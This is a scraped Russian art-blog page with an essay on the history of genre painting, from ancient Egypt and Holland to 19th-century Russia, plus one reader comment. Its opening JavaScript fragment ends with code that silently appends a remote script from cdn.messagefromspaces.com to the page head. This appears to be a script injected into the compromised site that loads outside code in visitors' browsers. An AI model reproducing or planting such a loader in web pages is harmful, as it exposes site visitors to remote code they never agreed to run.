, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Живопись на бытовую тему

Автор: Дмитрий Алмазов | 12 Мар 2014

Живопись на бытовую темуКак необычно можно передать с помощью живописи простой быт человека. Ведь мы не раз замечали, как любим наблюдать за людьми, которые заняты работой. Так же и художникам нравиться изображать повседневную жизнь человека, будь она частной или общественной.

Ещё в исторических рисунках Древнего Египта и Греции можно найти элементы бытовой живописи. Эти элементы отражались в виде охоты, рыбной ловли, уборки посевов, пиров, шествий, танцев, молитв и жертвоприношений, передавая своим будущим потомкам историю с помощью, ещё тогда не задуманного бытового жанра.

Бытовая живопись так же использовалась и в странах Востока. В 7-10вв н. э. были созданы школы китайской жанровой живописи. Китайские художники изображали в основном сцены императорского двора, отдавая предпочтение изображению мощи и силы своего императора.

Время шло и вместе с ним изменялась, преобразовывалась и всё чаще передавалась живопись на бытовую тему. Художники всё чаще прибегали к бытовой техники живописи, раскрывая в искусстве важные социальные вопросы общества — реалистические и демократические тенденции Нового времени.

Нельзя не отметить глубокое развитиe бытового жанра в искуcстве Голландии 17 в., где с удивительной передачей эмоционального фона, раскрывались обычные сцены голландского быта. Представителями Голландской бытовой живописи являются Франс Халс «Малле Баббе», Ян Вермер « Офицер и смеющаяся девушка». Художники этой монотонно пейзажной страны специализировались в основном на маринах или земных пейзажах. Но открыв бытовой жанр, они стали изображать на фоне моря и полей традиции своего народа, украсив при этом однообразное понимание бытовых сцен.

В России со второй пол. 19 в., термин « бытовая живопись» был официально признан в Петербургской академии художеств. Художников, создающих картины на бытовые темы, стали называть жанристами. Отсюда и появилось двойное название бытовым изображениям — бытовая (жанровая) живопись.

Живопись на бытовую темуВзрывное развитие техники, промышленная и научная революция, урбанизация решительно поменяла быт миллионов людей, предавая бытовой живописи импульсивность и новые изменения общества. Но наряду этих изменений терялась духовность. Художники всё чаще изображали одиноких людей в грязных закоулках, потерявших кров, людей готовых к борьбе за себя и детей. Терялось, в передаваемом быте, нынешнее веселье и дружелюбие.

Но не смотря на изменение общественного быта, революционные скачки, технический прорыв, разнообразные передаваемые представления художников, в центре живописи на бытовую тему был и всегда будет находиться человек. Ведь быт, всего лишь часть жизни нашего общества.

Темы: о Живописи | 1 отзыв »

Один отзыв на “Живопись на бытовую тему”

  1. Елена пишет:
    23 Мар 2014 в 16:31

    Выбранная тема очень актуальна, поскольку наиболее близка любому человеку. Повседневный быт всегда будет интересовать нас наиболее всего, не зависимо от того чем мы увлекаемся, и насколько мы успешны. А благодаря произведениям искусства мы можем понаблюдать за бытом в различных эпохах.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress